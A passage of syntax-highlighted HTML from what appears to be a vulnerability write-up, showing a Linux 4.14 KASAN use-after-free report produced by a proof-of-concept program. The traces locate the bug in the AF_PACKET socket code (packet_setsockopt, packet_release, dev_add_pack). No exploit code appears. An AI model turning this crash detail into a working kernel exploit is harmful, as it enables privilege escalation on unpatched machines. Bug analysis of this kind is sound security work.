<\/span><span class=\"crayon-e\">addr <\/span><span class=\"crayon-e\">ffff880067d28870 <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-e\">task <\/span><span class=\"crayon-v\">poc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1175<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-5\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.732594<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-6\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.733605<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CPU<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PID<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1175<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Comm<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">poc <\/span><span class=\"crayon-st\">Not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">tainted<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4.14.0<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rc1<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#29<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-7\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.737714<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Hardware <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">QEMU <\/span><span class=\"crayon-e\">Standard <\/span><span class=\"crayon-e\">PC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i440FX<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PIIX<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1996<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">BIOS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1.10.1<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1ubuntu1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">2014<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-8\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.746433<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Call <\/span><span class=\"crayon-v\">Trace<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-9\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.747985<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dump_stack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x6c<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x9c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-10\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.749410<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dev_add_pack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1b1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-11\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.751622<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">print_address_description<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x73<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x290<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-12\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.753646<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dev_add_pack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1b1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-13\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.757343<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kasan_report<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x22b<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x340<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-14\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.758839<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">__asan_report_store8_noabort<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x17<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-15\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.760617<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dev_add_pack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1b1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-16\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.761994<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">register_prot_hook<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">part<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x90<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xa0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-17\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.763675<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">packet_create<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x5e3<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x8c0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-18\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.765072<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">__sock_create<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1d0<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x440<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-19\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.766030<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">SyS_socket<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xef<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1b0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-20\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.766891<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">move_addr_to_kernel<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x60<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x60<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-21\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.769137<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">exit_to_usermode_loop<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x118<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x150<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-22\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.771668<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">entry_SYSCALL_64_fastpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x13<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x94<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-23\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.773754<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0033<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0x44d8a7<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-24\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.775130<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00007ffc4e642818<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">EFLAGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000217<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ORIG_RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000029<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-25\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.780503<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffffffffffffffda <\/span><span class=\"crayon-v\">RBX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000004002f8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RCX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000044d8a7<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-26\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.785654<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000011<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000003<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000011<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-27\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.790358<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RBP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00007ffc4e642840<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000000000ca<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00007f4192e6e9d0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-28\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.793544<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R11<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000217<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000040b410<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-29\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.795999<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000040b4a0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-30\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.798567<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-31\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.799095<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Allocated <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-i\">task<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1360<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-32\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.800300<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">save_stack_trace<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x16<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-33\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.802533<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">save_stack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x46<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xd0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-34\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.803959<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kasan_kmalloc<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xad<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xe0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-35\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.805833<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kmem_cache_alloc_trace<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xd7<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x190<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-36\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.808233<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">packet_setsockopt<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1d29<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x25c0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-37\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.810226<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">SyS_setsockopt<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x158<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x240<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-38\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.811957<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">entry_SYSCALL_64_fastpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x13<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x94<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-39\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.814636<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-40\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.815367<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Freed <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-i\">task<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1175<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-41\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.816935<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">save_stack_trace<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x16<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-42\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.821621<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">save_stack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x46<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xd0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-43\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.825576<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kasan_slab_free<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x72<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xc0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-44\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.827477<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kfree<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x91<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x190<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-45\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.828523<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">packet_release<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x700<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xbd0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-46\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.830162<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sock_release<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x8d<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1d0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-47\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.831612<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sock_close<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x16<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-48\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.832906<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">__fput<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x276<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x6d0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-49\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.834730<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">____fput<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x15<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-50\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.835998<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">task_work_run<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x121<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x190<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-51\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.837564<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">exit_to_usermode_loop<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x131<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x150<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-52\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.838709<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">syscall_return_slowpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x15c<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1a0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-53\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.840403<\/span><span 